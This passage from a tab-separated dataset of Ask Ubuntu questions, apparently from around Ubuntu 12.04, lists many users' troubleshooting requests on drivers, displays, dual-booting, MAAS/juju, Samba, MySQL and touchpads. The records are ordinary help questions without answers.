/sys/devices/system/cpu/cpu0/cpufreq/ files will save . but when i re-open the scaling_governor file , there is `` performance '' , sitting smugly and toasting the laptop to kingdom come . installing cpufreq frontend on the panel applets does n't allow me to change the governor at all . installing indicator-cpufreq seems to allows me to change the frequency briefly but it soon reverts to type .
181474	now that i built unity how do i install it ?	hello there i built my own custom unity 6.2 and i built it so that it is in my home directory . i like how it looks now and want to replace the unity that i have installed on my system with the one that i have just built . more about the unity build i used qtcreator to build it when it asked where i wanted to build it i gave it the path of ~desktop/unity-6.2.0+bzr2624ubuntu0+762-build/ it builds and it is awesome i can run it and i love it . but i can not figure out how to install it . please let me know if you need extra info .
181476	where can i locate the file that handles power configurations and hdd parameters ?	i 'm trying to compare the differences between how power management is handled on battery and when plugged in . as a result i want to look at the config files for the two instances . thanks in advance .
181479	how to get bigger photos ' thumbnails in nautilus ?	today i wanted to go through my photos collection but i have realised that it is quite difficult to go through thumbnails in nautilus as it is using the free space in the window very inefficiently , e.g . is there any other option to use it less `` padding '' , free space between other photos ? or should i use other window manager to achieve this ?
181481	how to create files and directorys in var/www ?	i 've just finished installing lamp on ubuntu and i 've gone to start created a website directory and i do n't know how to get into the `` root '' directory of lamp . can i use the terminal ? if so what would be the commands to create a new folder and create sub-folders inside that directory . also save php , css files into the directory and also images .
181482	system load indicator does not indicate network activity for huawei dongles	i have system load indicator installed which works perfectly except it shows no activity when i connect to the internet via a usb dongle . it works well when i connect via wifi or ethernet cable . how is this so ?
181485	printer sharing from xp to ubuntu	i 'm trying to share a printer from my windows desktop ( the host ) to my ubuntu desktop ( the computer i 'm printing from ) . i 've seen plenty of guides that work the other way around , but how can i go from windows to ubuntu , not ubuntu to windows ?
181487	can not connect to the internet	my desktop has broadband wired connection - shows connected , but unable to load any web page in ubuntu 12.04 but works fine with windows 7 . my laptop - wireless connection shows connected , but again does not load any web page . please help . on running sudo dhclient eth1 on my laptop there is no result - see the screen output : prajna @ laptop : ~ $ sudo dhclient eth1 [ sudo ] password for prajna : prajna @ laptop : ~ $ sudo dhclient eth1 [ sudo ] password for prajna : after giving password - some time later the screen comes back to prajna @ laptop : ~ $
181497	system.typeloadexception with monodevelop	yesterday i installed monodevelop 3.0 by following the steps suggested in this answer . however when i try to create a new solution , of any of the provided types , i get the following error : an error has occurred . a type load exception has occurred . system.typeloadexception : a type load exception has occurred . at ( wrapper managed-to-native ) system.reflection.monocmethod : internalinvoke ( system.reflection.monocmethod , object , object [ ] , system.exception & ) at system.reflection.monocmethod.invoke ( system.object obj , bindingflags invokeattr , system.reflection.binder binder , system.object [ ] parameters , system.globalization.cultureinfo culture ) [ 0x00000 ] in < filename unknown > :0 i posted this question elsewhere , and it was suggested that there might be some compatibility issue between pangolin and monodevelop . what does this error mean , and how do i fix it ? thanks .
181500	ati graphics problem	i am using hp compaq 6735b laptop and it comes with a ati mobility radeon hd 3200 graphics card . i have recently installed 12.04 on it . can someone tell me how will i know if the graphics card is working or not ?
181502	how to open a second hard drive ?	what i want to do : i have a hard drive installed with 12.04 64-bit . this however is quite a small solid state drive and i would like to move games , large files etc . to another hard drive that is much bigger , but keep ubuntu on my small hard drive . the problem : i ca n't find the hdd even though it shows up in `` storage devices '' ( sorry not very good at explaining it ) . i also looked in /media ( as this is where cd and other external devices can be opened from ) also looked in /dev . am i looking in the correct place ? i think i 'm correct in saying i 'm looking for f : / ( then this should be my large hard drive ) but i ca n't find it . it also shows up in the bios as `` being there '' . sorry i 'm having one of those days where words just do n't want to come together .
181504	i would like to replicate my ubuntu 12.04 ssd install onto an identical ssd	how do i replicate a ssd drive and copy the mbr so that that replicated ssd is identical ?
181506	all printouts condensed into left half on a samsung color laser printer clp-365w	after installing the samsung color laser printer clp-365w in 12.04 , the printout is condensed into the left half of the a4 page ( regardless whether 'fit to page ' on or off ) . this happens both with the automatically recognised ubuntu driver and the 'unified linux driver ' from the samsung website . ( the 300.ppd ( as per 'unified driver ' install ) or 360.ppd are the closest matches to '365 ' . ) any help ? ? test page printout test page printout closeup
181507	what username/password does maas assign to nodes ?	when commissioning a new node , what username/password does maas assign to the node after the os is installed ?
181508	how can i add a custom item to the sound indicator ( and make it clickable more than once ) ?	the original question one of the strength of unity are the various standardized indicators . i want to customize the sound indicator with an additional menu entry that runs a small shell script . i 'm not afraid of a little python code and i hope someone can point me to the right subroutine in the right file . i suspect that will be fairly easy but all the indicators are just so bloated that i ca n't look through their code in a reasonable time . any help is appreciated . i know it is possible as the marvelous skype-wrapper does it . edit 2 - now a dirty dbus hack the one click problem from one edit before has now turned into a dbus problem . basically we have to tell the sound indicator that our bogus player has terminated now . a dirty hack navigates around that problem : # ! /bin/bash # this is '/home/confus/bin/togglespeaker.sh' notify-send `` toggle speaker '' `` $ ( date ) '' qdbus \ com.canonical.indicator.sound \ /org/ayatana/indicator/service \ org.ayatana.indicator.service.shutdown exit 0 help from the community is appreciated as i do n't have experience any with dbus whatsoever . edit 1 - takkat found a solution but only clickable once ? for some reason the solution proposed by takkat has the drawback that the resulting entry in indicator sound can only be clicked once per session . if someone has a fix for , than please comment or answer , you will be upvoted . here you can see the result : i strongly suspect the issue is related to the .desktop-file in /home/confus/.local/share/application/togglespeaker.desktop , which is this : [ desktop entry ] type=application name=togglespeaker genericname=toggle speaker icon=gstreamer-properties exec=/home/confus/bin/togglespeaker.sh terminal=false and here is a minimal example of the script in /home/confus/bin/togglespeaker.sh for your consideration : # ! /bin/bash # this is '/home/confus/bin/togglespeaker.sh' notify-send `` toggle speaker '' `` $ ( date ) '' exit 0
181515	how to make `` xrandr '' work with gma500 ?	is it error at driver of graphic chip or xorg or kernel ? i am asus t91mt with gma500 , ubuntu 12.04.1 . i would like too see only a notice of connection at least . a log of xrandr : $ lspci | grep vga 00:02.0 vga compatible controller : intel corporation system corporation system controller hub ( sch poulcbo ) graphics controller ( rev 07 ) vp @ vc : ~ $ xrandr -- verbose xrandr : failed to get size of gamma for output default screen 0 : minimum 1024 x 600 , current 1024 x 600 , maximum 1024 x 600 default connected 1024x600+0+0 ( 0x138 ) normal ( normal ) 0mm x 0mm identifier : 0x137 timestamp : 26863 subpixel : unknown clones : crtc : 0 crtcs : 0 transform : 1.000000 0.000000 0.000000 0.000000 1.000000 0.000000 0.000000 0.000000 1.000000 filter : 1024x600 ( 0x138 ) 0.0mhz *current h : width 1024 start 0 end 0 total 1024 skew 0 clock 0.0khz v : height 600 start 0 end 0 total 600 clock 0.0hz vp @ vc : ~ $ xrandr -- prop xrandr : failed to get size of gamma for output default screen 0 : minimum 1024 x 600 , current 1024 x 600 , maximum 1024 x 600 default connected 1024x600+0+0 0mm x 0mm 1024x600 0.0* vp @ vc : ~ $ please help , i am linux newbie and i am tired ; /
181518	store the passphrase of encrypted disk in /etc/crypttab encrypted	i 'm wondering , if i can store the passphrase of an encrypted disk in /etc/crypttab encrypted - and only possible to decrypt that by that os , where i created . is it possible ? ( because , i want auto mount the disk after a restart , but i do n't want to allow to read that password from the file with a simple live disk ) thanks
181525	can not use second display with 12.04 and intel 2000/3000	i am unable to get anything to display on my second monitor , or even get the system to recognize that there is a second screen . i am running 12.04 on a gigabyte ga-h61m-s2pv , revision 2.0 box . the integrated chipset is an intel 2000/3000 , and there are both a d-dub and a dvi-d display ports on the mb . this is the first operating system i have installed on this system . i have a second monitor plugged into the dvi-d port via a dvi-d to d-sub adapter . i can not verify that the motherboard or adapter were/are working , short of installing windows to test the theory . when i go into the `` system settings - > displays '' control window , it shows one display . i have rebooted with the second monitor attached , and i have perused the bios settings in case it might have been disabled . so far , i have had no indication that the second monitor is recognized , not even a flicker at power on . if i swap monitors and cables between the dvi-d and d-dub ports , the other monitor lights up , so i know the monitor and video cable are not the issue . any suggestions would be appreciated .
181526	why do this pdf 's fonts appear unreadable on my machine ?	i 'm trying to read the art of assembly language as per this answer on stack overflow . when i open it on my ubuntu 12.04 box , it looks like this : i have n't tested it on another machine , but this ca n't be intentional . what is going on , and how can i fix it ? edit : the above screenshot is from chrome . it look like this in evince : still squished and hardly readable , but better . is there anything i can do to fix it ?
181532	emacs keybindings in ubuntu 12.04	i am trying to get emacs-like keybindings in gtk , firefox , chrome , etc . i have followed the directions recommended here ( and in lots of places ) but to no effect . in other words , i added gtk-key-theme-name = `` emacs '' to my .gtkrc-2.0 , and i also ran gconf-editor and set /desktop/gnome/interface/gtk_key_theme to `` emacs '' . i even rebooted just for good measure . i am using an ordinary 12.04 install , with unity 3d as the desktop environment .
181533	new 12.04.1 iso filename	i use a program called yumi from pendrivelinux.com to load all my linux distros from a usb thumbdrive . they just updated their installer to support the newest 12.04.1 released a couple days ago . it 's looking for a iso name of ubuntu-12.04 . *dvd-i386.iso but the file i downloaded from the ubuntu homepage is named ubuntu-12.04.1-desktop-i386.iso . can i simply change the name of my iso , or is there a difference in the iso ?
181536	routing ip to lxc virtual machine	i use lxc on my ubuntu server hosted in hetzner . the server ip is 5.x.x.85 and the additional ip i bought is 5.x.x.93 . the lxc vm is running on 10.0.3.2 . how to route the additional ip ( 5.x.x.93 ) to the vm ?
181537	fail to download repository information	why lately i 've been getting this error when i try to update my computer ? ubuntu 12.04 kernel 3.5.2 processor i386 w : failed to fetch http : //ppa.launchpad.net/kernel-ppa/ppa/ubuntu/dists/precise/main/source/sources 404 not found , w : failed to fetch http : //ppa.launchpad.net/kernel-ppa/ppa/ubuntu/dists/precise/main/binary-i386/packages 404 not found , e : some index files failed to download . they have been ignored , or old ones used instead .
181540	skype on gnome logout with webcam and screen sharing	syslog : on pastebin every time i turn on my webcam and start the screen sharing my ubuntu 12.04 ( unity 3d ) logs out and show me the login screen . the syslog above shows the relevant lines . does someone know any solution ? btw : my skype version : skype 4.0.0.8
181543	ca n't login due to losing power during an update	few days ago while ubuntu 12.04 was doing a common system update , my laptop turned off in the middle of process due to bad ac power . since then , i can only login but nothing else . a message about compiz appears , but mouse , keyboard , icons , unity are not working . the only thing i was able to do is a boot repair , as described in ubuntu 's site , but neither this helped . hope you can help me .
181547	right click to add icon into unity 2d panel not working	i updated to 12.04 from 10.04 , and had problems with sound . now the sound works but i ca n't add icons to the top panel . i 've tried all these and they do n't have any effect : just right click alt + right click super + alt + right click hold left click + hold alt + right click
181550	will just any ir remote work with an irda adaptor ?	will irda accept just any old universal remote or does it have to be a special kind ?
181556	how to reorder a rhythmbox custom list by name/artist	i want to reorder a list of song i have in rhythmbox in a specific order ( right now by song name ) . i want to do this since when i import them to my ipod shuffle they are very random ( same as the list ) . how can i order the songs by song name or author so it is easier for me to look for a specific one in rhythmbox or to import them in a specific order to my ipod .
181560	uninstall ubuntu	i installed ubuntu with wubi and it does n't boot . can i get it off my hard drive by simply deleting the ubuntu folder from drive c in windows ? what does `` uninstall wubi '' in the ubuntu folder do ? thanks , jt
181562	windows partition unreconizable due to ubuntu instalation	i installed ubuntu and set my windows 7 partition as the swap ... . dumb move obviously . windows 7 was unable to boot so i reinstalled windows on a completely different partition and the original windows 7 partition is n't recognized . so i 'm back in ubuntu and using disc utility i can see the partition in question and i 'm wondering how i can convert it back to nfts with out loosing any of my data from that partition ( originally containing windows 7 ) i noticed an edit partition option but i can not find an literature on what that does specifically in the department of file preservation .
181563	content that uses flash begins to play in fast forward after 30 mins ( or so )	example : youtube videos play in fast forward . ubuntu 12.04 ( x64 )
181565	sharing samba shares across subnets	i have samba servers dotted around different regions all connected via site to site ipsec vpn , i can ssh into each one using their respective ipâs . i have main region , and sub regions . this issue is basically about sharing samba across subnets . i created a test share , public , open to the network . i can access this from the main region to the sub region , and then i can create the same sort of share on the main region and no problem . viola ! a samba share across subnet that works , bar no user password protection . then i add a group and some users into the group and i force the share to become accessible only by that group . and thatâs when it goes crazy . works from the sub regions to the main region without a problem however , trying to browse to the sub region from the main region wont work . it asks me for the username and password but just keeps asking and asking . ( actually knowing what log records this might be helpful too , i ca n't seem to find it ) usernames and passwords work locally on all the samba regions . to make things weirder . i have a 2003 server , that runs dns and wins , of which i had disabled wins for the most part while testing . it was also the vpn server , well still is . and this is weird , but if i connect to the 2003 vpn server . i can connect to any samba share i want , ( provided i supply the right username and password ) so in a nutshell . site to site ipsec samba shares work locally both sub and main region samba share with users and groups work locally both sub and main region sub regions can access main region with users and groups and plain shares main region can access sub regions plain shares main region ca n't access sub region password shares , however , can do so when connected to windows vpn server . if i try to connect to the share without the vpn , it just keeps asking over and over for my username and password . please help .
181566	overheating and shutdown problems when adobe flash runs ?	i 'm a new user of ubuntu and using a dell latitude d630 . when i browse to site that have some flash animation ( mostly advertisements ) , the temperature of cores increase dramatically ( i check with sensors , in the worse case it was 104c for one core and 93 for the other core ) and if i do n't close the website it will shutdown the laptop . do you have any suggestion or solution for that ? ps : as an example for crashing sites you can see `` tabnak.ir '' , a news website with lots of ads .
181568	online accounts : failed to get the `` token '' request : can not resolve proxy hostname ( )	i had my computer with ubuntu 12.04 a few months without a network card and now it has a new and functional empathy i try to connect on facebook or posting photos or import shotwell right through my contacts i get this error : failed to get the `` token '' request : can not resolve proxy hostname ( ) how do i solve it ? -- spanish tuve mi computadora con ubuntu 12.04 unos cuantos meses sin tarjeta de red y ahora que tiene una nueva y funcional me intento conectar en empathy o publicar fotos en facebook atravez de shotwell o importar mis contactos me sale este error : error al obtener el «token» solicitado : can not resolve proxy hostname ( ) ¿como lo resuelvo ?
181571	monitor goes blank after 30 minutes . no keyboard or mouse are attatched , but computer is controlled over ssh	currently trying to set up a media server which i can control with my laptop or phone . after looking at all the options i decided upon using ssh to start mplayer in fullscreen . everything is working fine . until 30 minutes in when the monitor suspends . i can make the monitor wake up from suspension with the xset -dpms , but the screen stays black , until i plug in a peripheral and do some for of input .
181582	how can i lower the cpu temperature ?	i have installed ubuntu 12.04 on my eeepc 1015px and i 've noticed that the cpu temperature does not go below 60ยบc ( 70 is usual ) . looking at powertop it seems the 2 cores ( atom n570 ) are idle most of the time . i 've installed jupiter ( w/ jupiter-eee-support ) but it did not help . edit : meanwhile i 've found out that echo 2 > /sys/devices/platform/eeepc-wmi/cpufv is supposed to turn on super hybrid engine . though it seems to help a bit ( temperature goes down 2-3ยบc ) , the temperatures are still in the 60-70ยบc range .
181583	how do i add the internet archive as a music source to rhythmbox ?	i tried banshee once and it had an internet archive plugin that was great . can i add the internet archive as a source in rhythmbox ?
181590	clipboard history : need to get something far back	i really need to get some text i copied earlier on today ( i have probably copied stuff hundreds of times after that ) . my computer has been running from the time the text was copied . i do not have any clipboard programs installed . is it possible to get this text somehow ? i 'm using 11.10 .
181595	i am getting input/output error while opening a folder in 12.04	i am getting input/output error while opening a folder in 12.04 . also , i am not able to see file in another folder . i am getting below error . please help me recovering the folder . error : error when getting information for file '/media/data/softwares/windows ' : input/output error please select another viewer and try again .
181602	how do i fix `` importerror : can not import name urandom '' when running fabric in virtualenv ?	end of stack trace : file `` /usr/lib/python2.7/random.py '' , line 47 , in < module > from os import urandom as _urandom importerror : can not import name urandom there was a problem importing our ssh library ( see traceback above ) . not an issue in 11.10 . problem started after i upgraded to 12.04 . how can i fix it ?
181606	wow runs faster on gnome shell compared to unity	i have been trying to run wow on ubuntu 12.04 . when i run it on unity , the frame rate is very low and it is impossible to play . although , when i launch it on gnome shell , for some reason , the frame rate gets very high and the playing experience is very comfortable . the problem is that i prefer running unity instead of gnome shell , but i like to play wow too . is there a way to run wow on unity , with no lag ?
181607	how to install the latest stable version of thunderbird ?	how can i install thunderbird 15 on ubuntu 12.04 ? i tried to install run the binary-file but i get this message : ./mozilla-xremote-client : error while loading shared libraries : libplds4.so : can not open shared object file : no such file or directory i added ppa : ubuntu-mozilla-daily/ppa .
181609	trouble installing ubuntu 12.04 from usb	i want to dual-boot ubuntu desktop 12.04 on my new ultrabook which has an intel i7 3517u processor 6gb ram windows 7 , 64-bit no cd/dvd drive i created my bootable usb stick using pendrivelinux.com with the `` ubuntu-12.04.1-desktop-i386.iso '' . i am following these directions because they include nice screenshots ; however , i do not get very far in the process . i am able to boot into the live desktop , and then i try to install onto my hard disk . here are the series of actions that i take next : first , i see this ( http : //i.imgur.com/vucyh ) window , and click 'continue ' then i get this ( http : //imgur.com/2wesc ) window , and click 'continue ' again this appears : and i get worried because it seems like there is no recognition that i have windows installed . according to the directions i am following , i should see /dev/sda1 and /dev/sda2 partitions . in the drop-down menu at the bottom the only `` device for boot loader installation '' is /dev/sdb and no information is shown . i am hesitant to click 'install now ' for fear of what it might do to windows . 4 . i click 'quit ' and cancel the installation , but then about 5 seconds later this ( http : //imgur.com/a/yxi0c ) window pops up ( i have expanded it to full screen to scroll and show all the details ) . 5 . another second later this ( http : //imgur.com/vxcrn ) comes up . i 'm not sure how relevant this is . does anyone have any insight into this issue ? ? why does it not show my current windows partition ? what would happen if i tried to continue with the installation process ? thanks ! ps - sorry , it would only let me post 2 hyperlinks as a new user
181610	how to design non-windowed gtk.frame in glade ?	i 'm building a todo app for personal purposes , and i 'm using quickly and glade . i want it to display a list of the pending to-do elements . the problem i 'm having is that i ca n't find the way to create a single frame ( not inside another window ) with some other widgets inside to dynamically add them to a vbox that i already have created in glade . is there a way to do it or do i have to create the frame in the code ?
181611	installing ubuntu on a new computer ?	can i install ubuntu on a brand new computer with all new parts including hard drive ? or must i have windows or mac os installed first before installing ubuntu ?
181612	how to completely remove all flavours of ubuntu from ubuntu studio	er , this may be crazy , i installed all flavours of ubuntu ( ubuntu desktop , kubuntu , lubuntu , edubuntu , xubuntu , mythbuntu ) onto my computer . now i want to completely remove all to get back my ubuntu studio . is this possible ? i would like a terminal solution like sudo apt-get remove ...
181613	how to disable the mount notification in gnome 3.4 ?	how to disable those annoying notifications when you plug a new disk in , or connect to a network and so on ... . i know that if i add a device to a mount script they will be mounted on boot thus not showing me the notification , which i did for my hard drives , but it does n't help with all those flash disks i have ... i ca n't add them all that would be silly . i looked at : how can i disable gnome-shell 's notification area ? ... but they did n't help , since the code was different i also looked at configuration editor , but i think it can only disable auto-mount when inserted , it does n't disable notification ...
181616	i need to disable touchpad	how to disable touchpad automatically when i either log in or the machine wakes up ? to disable it i run xinput set-prop 12 `` device enabled '' 0 but every time the system is suspended and woken up , touchpad gets enabled again . i do not know why . where do i need to put this command ? which file ? so that it is run on resume/reboot ? i just need my touch pad disabled forever .
181623	freetds ./configure unrecognized option -- prefix	i 'm trying to compile freetds according to these instructions : http : //www.mavrick.id.au/2012/php-5-3-6-mssql-freetds/ however configure is failing . my command is : ./configure -- enable-msdblib -âprefix=/usr/local/freetds i 'm getting configure : error : unrecognized option : `-âprefix=/usr/local/freetds' try `./configure -- help ' for more information . for all command line options , even -- help i have build-essentials , gcc and make installed . i also tried sudo , even though i am logged in as root . it seems to me something is still missing ?
181628	compiz does not work with proprietary nvidia driver	i have a thinkpad t420 with an nvidia quadro video card . it crashes constantly when i close this lid ( if you are curious.. ) and i suspect on a problem with nouveau drivers , so i installed the proprietary nvidia drivers . howeer , when i install and use this driver , compiz does not work . if i start a session with uses compiz , no window manager/decorator is presented . i just can get metacity working . does anyone has any idea about what may be causing this problem ? edit : i am using the nvidia driver version 304.37 . my video card is an nvida quadro nvs 4200m . lspci informs me that there is another controller in my machine : vga compatible controller , intel corporation 2nd generation core processor family integrated graphics controller , which sounds strange to me ( i actually do not understand a lot about hardware and would expect to have only one card in my notebook ) . my ubuntu is 12.04 .
181630	unity quick launch icon opens another program icon on program start	i prepared a custom .desktop file for my chromium browser that loads a different user profile . when ever i click the icon now it open the browser , but also uses a new icon on the launcher bar ( not locked to the launcher ) . is there any way to tell the program to keep connected to the first icon ? [ desktop entry ] type=application name=second browser exec=chromium-browser -- user-data-dir= '' /home/patrick/bin/chrome-profiles/second '' tryexec=chromium-browser icon=/home/patrick/.local/share/applications/icons/browser.png mimetype=text/html ;
181632	is it possible to specify an image or list of packages to install on a per-node basis in maas ?	or , is this a job for juju instead ?
181634	is it possible to have the same juju master node for multiple environments ?	does each juju environment specified require its own master node , or will different juju environments share the same master node ? moderator note : this was merged by mistake . apologies . as merging ca n't be undone i 've got egg on my face . bryan if you 'd please open a new question with the same subject in order to continue .
181635	is it possible to have juju use a maas server as the master node ?	or must juju randomly choose a node as the master from the list of available maas nodes ?
181636	can you limit which maas nodes can be used as part of a juju environment ?	as examples , either based on node name or on system requirements ?
181642	how can i only disable unity panel ?	i use ubuntu 12.04 , i am going to use cairo-dock as my panel and task bar . i only want to disable unity panel and continue using dash search feature . i do not want unity panel track my open task . how can i do it ?
181643	trouble installing ubuntu with usb on laptop	i have created a bootable usb stick using universal usb installer 1.9.0.9 and tried to boot from my usb on a laptop with a clean hard drive . i keep getting the message could not find kernel image : vesamenu.c32 . i have found the file on the usb , what am i doing wrong ?
181644	stuck on orange screen during/after installing 12.04.1	i was using 10.10 , so i did not want to upgrade . i downloaded the ubuntu-12.04.1-desktop-amd64.iso and burn into a pen-drive . i tried to install twice and both times , i got stucked on this orange screen without windows . then i downloaded again on a mac , the same .iso , checked the md5 and burn to a cd . but again , i got the same orange screen . i have four partitions , one is for windows os , the second a free space to files that i use on both os , the third are ubuntu and swap . grub is ok . the ctrl+alt+f1 method does n't work .
181645	how do i add available resolutions ?	i 've been having an issue with my monitor - it only displays 640x480 . which is terrible , and making it incredibly difficult to type this question . but when i try running xrandr to add resolutions , i get this error : x error of failed request : badname ( named color or font does not exist ) major opcode of failed request : 150 ( randr ) minor opcode of failed request : 16 ( rrcreatemode ) serial number of failed request : 29 current serial number in output stream : 29 i urgently need help - school is starting soon for me and i 'd like to work with a halfway decent monitor . ( graphics info ) : opengl vendor string : tungsten graphics , inc opengl renderer string : mesa dri intel ( r ) sandybridge mobile x86/mmx/sse opengl version string : 3.0 mesa 8.0.2
181649	windows 7 + ubuntu dual boot disk partition problems on a lenovo help ?	i 'm trying to put ubuntu on my new lenovo y580 for school . according to the internet , i must partition my hard drive to give ubuntu a home . when i break off 50gb of my c drive , i encounter two problems : 1 ) it automatically makes the partition a dynamic type instead of basic ; you can not install an os on a dynamic ( from my understanding ) . if there is no better way to convert it to basic , i can use a third party program to do that . however ... 2 ) even when i click `` yes '' to go ahead and make a dynamic partition , my computer says there is not enough space available on the disk ( s ) to complete this operation . my 500 gb hdd is far from full , and i tried shrinking the partition to 10gb , same error . i am using the 12.04.1 . since i 'm using a laptop , i do not have the option to just use another hdd . first time trying to dual boot . rapid fire : is 50gb a decent partition amount ? what is the difference between using the ubuntu windows installer rather than installing it from a disk drive ? it is n't like a `` lite '' version , is it ? compspecs : i7 3610 qm , 8gb ddr3 , nvidia 560m 2gb , 500gb 7200rpm hdd
181651	how to assign hot-keys to control rhythmbox ?	i wish to assign ctrl+space to rhythmbox play/pause but can not figure out how to do so using the keyboard menu , for whenever i try , it is disabled for i do not know what i am meant to type into the shortcut field .
181658	ca n't restore from hibernate ( sudo pm-hibernate ) on new dell xps 15z laptop in 12.04 lts	i have a new dell xps 15z laptop and did a fresh install of 12.04 lts on it . i 've looked at several guides such as `` how to enable hibernation in 12.04 ? '' and `` dell xps 15 l502x & ubuntu 12.04 linux '' , which says to first try running sudo pm-hibernate to see if it works before adding the hibernate option to the system menu . when running that command the screen switches to black , i see a little text cursor blink in the top left of the screen for a few seconds , then the system shuts off ( as expected ) . when i power it up again , however , it starts up from scratch rather than resuming the suspended state . i have 7.7gb of ram and 7.9gb of swap space , as was automatically set up during the ubuntu installation . looking at the main ubuntu wiki page for this hardware , it says `` to hibernate , on ubuntu 12.04 , laptop should be certified , but it is working fine with this type of laptop , so if you like to activate hibernate function , you have just to create this file ... '' , so because it works for others on this laptop i must be doing something wrong . i followed the steps in that guide to put acpi=noirq into the default grub options in order to fix booting problems . i have n't done the other steps for bumblebee nvidia support , but when i tried it earlier it did n't help things . i have a new laptop and a fresh install of 12.04 lts , so i 'm willing to try anything to get hibernate working . does anyone have ideas ? in case it 's an issue with the swap space , here is the output of sudo fdisk -l. could this problem have something to do with selecting the option of encrypting my home directory , which is asked on the ubuntu installation screen ? i see something about /dev/mapper/cryptswap1 below : disk /dev/sda : 750.2 gb , 750156374016 bytes 255 heads , 63 sectors/track , 91201 cylinders , total 1465149168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 4096 bytes i/o size ( minimum/optimal ) : 4096 bytes / 4096 bytes disk identifier : 0x0006a9e3 device boot start end blocks id system /dev/sda1 * 2048 1448589311 724293632 83 linux /dev/sda2 1448591358 1465147391 8278017 5 extended partition 2 does not start on physical sector boundary . /dev/sda5 1448591360 1465147391 8278016 82 linux swap / solaris disk /dev/mapper/cryptswap1 : 8476 mb , 8476688384 bytes 255 heads , 63 sectors/track , 1030 cylinders , total 16556032 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 4096 bytes i/o size ( minimum/optimal ) : 4096 bytes / 4096 bytes disk identifier : 0xd09077d5
181659	how to save a pdf sent to me by email	i 've been sent a pdf by email and when i open it there 's no `` save as '' option . if you choose the `` save a version '' option , you do n't know where it 's saved to . if , when you open it , you select the `` save file '' option , again you do n't know where it 's saved to . i 'd be grateful if anyone could help ! thank you .
181662	how to restore deleted /usr/local/lib ?	how can i get back /usr/local/lib ? i accidentally deleted it . i ran sudo rm -rf lib inside /usr/local/ . i am using 12.04 .
181663	how to get conky to stay on the desktop	i have a conky setup that i 've used on a number of desktops ( here 's the conkyrc ) . it works fine in ubuntu unity , xfce , gnome and openbox , but not lubuntu ( lxde ) . the problem is that i can not get it to stay on the lubuntu lxde desktop reliably . either the conky window disappears if i click the desktop or if i minimize all windows ( show desktop ) . i 've tried all variations in the configuration file for `` own_window '' , `` own_window_colour '' , `` own_window_transparent '' and `` own_window_type '' and have googled quite a bit to resolve this . if it edit the conkyrc file and set the own_window_type to `` normal '' , conky disappears if i minimize all windows . if i set it to `` desktop '' it disappears if i click anywhere on the desktop . if i use `` override '' it does n't display at all . and the other options do n't work well for obvious reasons . on another ubuntu unity install i had a similar problem , but got around it by using compiz config settings manager to ignore my conky window . on my netbook lubuntu install i do n't have compiz installed . how can i get conky to stay on my desktop .
181664	strange glitched screen on startup	i just ran the windows installer of ubuntu and every boot up is accompanied by this nice i 've used the windows installer , i 've made a bootable disk x32 and x64 . i 've re-installed windows to ensure it 's nothing with windows . i 've also ran ubuntu on this machine before about a year ago . i do n't have any hardware problems . my laptop is a asus g60jx .
181668	unable to install mysql under ubuntu 12.04 lts	i 'm getting the following error when trying to install mysql server under ubuntu : setting up mysql-server-5.5 ( 5.5.22-0ubuntu1 ) ... start : job failed to start invoke-rc.d : initscript mysql , action `` start '' failed . dpkg : error processing mysql-server-5.5 ( -- configure ) : subprocess installed post-installation script returned error exit status 1 dpkg : dependency problems prevent configuration of mysql-server : mysql-server depends on mysql-server-5.5 ; however : package mysql-server-5.5 is not configured yet . dpkg : error processing mysql-server ( -- configure ) : dependency problems - leaving unconfigured no apport report written because the error message indicates its a followup error from a previous failure . errors were encountered while processing : mysql-server-5.5 mysql-server e : sub-process /usr/bin/dpkg returned an error code ( 1 ) i 've tried all kinds of solutions i had found on the web , but none of them works : i 've tried apt-get purge mysql-server* mysql-common , i 've deleted all directories , i 've tried installing by apt-get install -f mysql-server , i checked dpkg -s and also dpkg -- configure mysql-server-5.5 more info : kernel : 3.0.8+ ubuntu 12.04 lts hardware : mk802 ( a chip arm ) login as root with password
181673	why does this page say java is running if i do n't have the java plugin installed ? how do i find and disable the java plugin for firefox , and others ?	why does this page say java is running if i do n't have the java plugin installed ? how do i find and disable the java plugin for firefox , and others ? http : //www.java.com/en/download/testjava.jsp i need to make sure that java is diabled so that my pc does n't get exploited . to answer this question i will accept : how to find the java plugin why the java plugin is n't listed in firefox how to remove the java plugin other info
181675	only one processor core could be enabled according to dmidecode	i am a little bit surprised with the following information that i get with dmidecode : srs @ ubuntu : ~ $ sudo dmidecode -t processor # dmidecode 2.9 smbios 2.6 present . handle 0x0004 , dmi type 4 , 42 bytes processor information socket designation : lga1155 type : central processor family : < out of spec > manufacturer : intel id : a7 06 02 00 ff fb eb bf version : intel ( r ) core ( tm ) i5-2500k cpu @ 3.30ghz voltage : 1.0 v external clock : 100 mhz max speed : 3800 mhz current speed : 3300 mhz status : populated , enabled upgrade : other l1 cache handle : 0x0005 l2 cache handle : 0x0006 l3 cache handle : 0x0007 serial number : to be filled by o.e.m . asset tag : to be filled by o.e.m . part number : to be filled by o.e.m . core count : 4 core enabled : 1 characteristics : 64-bit capable however from gnome-system-monitor i can see 4 cpu working at the same time .
181676	how to disable touchpad while using trackpoint on a thinkpad ?	thinkpads ( e.g . x230 that i 'm using ) have both a trackpoint and a touchpad . the touchpad is disabled when typing . however , when i 'm using the trackpoint , i often touch the touchpad as well , and generate mouse clicks i 'd like to avoid . does anyone have an idea how disable mouse-clicks on touchpad when trackpoint is in use ? edit : also , can someone explain how the option of disabling touchpad when typing works ? what is being done behind the scenes ? is it an xinput configuration command , and if yes , which one ? edit2 : clarification ; manually disabling touchpad ( even with a shortcut ) is not the issue here . this should work just like the option `` disable touchpad when typing '' , since i use touchpad and trackpoint interchangeably ( most frequently , i use touchpad for scrolling and trackpoint for moving the cursor ) .
181677	how to create unified clipboard	working with clipboard can be like a hell . sometimes ctrl+c just do n't work and if you copy some text on , say , web browser you ca n't normally paste in somewhere else . especially between terminal and other programs . sometmies you have to paste with ctrl+shift+insert sometimes ctrl+v . is there any way to unify handling clipboard ?
181679	i can not install 12.04	i have windows 7 installed on my machine with 297gb hdd . when i tried to install ubuntu with wubi , there 's a black screen saying use ( hd 0,0 ) can not install wubi . after restarting the computer , the dual-boot screen appears but and then the same warning again . i recently have my hdd changed because it was n't functioning but i use windows 7 perfectly . before my hard disk stopped functioning , i was able to download and install ubuntu with wubi installer and was using ubuntu perfectly .
